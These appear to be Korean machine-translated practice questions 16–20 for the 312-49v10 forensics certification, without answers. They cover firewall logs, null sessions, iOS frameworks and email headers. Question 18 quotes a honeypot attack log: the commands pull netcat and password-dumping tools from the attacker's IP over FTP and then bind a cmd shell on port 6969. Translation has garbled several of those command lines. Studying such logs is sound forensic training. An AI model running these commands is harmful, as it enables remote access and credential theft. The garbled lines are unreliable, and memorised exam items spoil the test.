312-49v10 문제 16

조사관은 다음과 같은 Cisco 방화벽 로그를 확인하고 있습니다.
Aug 21 2019 09:16:44: %ASA-1-106021: 외부 인터페이스에서 10.0.0.44에서 10.0.0.33까지 ICMP 역방향 경로 확인 거부 %ASA-1-106021은 무엇을 의미합니까?

312-49v10 문제 17

CEH 보안 세미나에 참석한 후 보안을 강화하기 위해 네트워크에서 수행하고 싶은 변경 사항 목록을 작성합니다. 가장 먼저 변경해야 할 사항 중 하나는 서버에서 RestrictAnonymous 설정을 0에서 1로 전환하는 것입니다. 이는 앞서 말했듯이 익명 사용자가 서버에 널 세션을 설정하는 것을 방지합니다. 세미나에서 언급된 Userinfo 도구를 사용하여 서버 중 하나와 널 세션을 설정하는 데 성공했습니다. 왜 그런 겁니까?

312-49v10 문제 18

다음은 lab.wiretrip.net에 호스팅된 허니팟 로그에서 발췌한 것입니다. Snort는 213.116.251.162에서 유니코드 공격을 보고했습니다. 파일 권한 정규화 취약점(UNICODE 공격)으로 인해 일반적으로 스크립트를 실행할 권한이 없는 임의의 폴더에서 스크립트가 실행될 수 있습니다. 공격자는 유니코드 공격을 시도하고 결국 boot.ini를 표시하는 데 성공합니다.
그런 다음 msadcs.dll을 통해 RDS를 사용하는 것으로 전환합니다. RDS 취약점으로 인해 악의적인 사용자가 IIS 서버에서 셸 명령(예: CMD.EXE)을 실행하는 SQL 문을 구성할 수 있습니다. 그는 디렉터리가 존재하는지 확인하기 위해 빠른 쿼리를 수행하고 msadcs.dll에 대한 쿼리를 통해 디렉터리가 올바르게 작동하고 있음을 보여줍니다. 공격자는 아래와 같이 명령이 실행되는 RDS 쿼리를 만듭니다.
"cmd1.exe /c 열기 213.116.251.162 >ftpcom"
"cmd1.exe /c 에코 johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo pdump.exe >>ftpcom 가져오기"
"cmd1.exe /c echo samdump.dll >>ftpcom 가져오기"
"cmd1.exe /c 에코 종료 >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"
주어진 익스플로잇에서 무엇을 추론할 수 있나요?

312-49v10 문제 19

iOS 기반 모바일 장치용 애플리케이션 개발에 사용되는 프레임워크는 무엇입니까?

312-49v10 문제 20

다음 이메일 헤더에서 이메일은 처음 어디에서 왔습니까?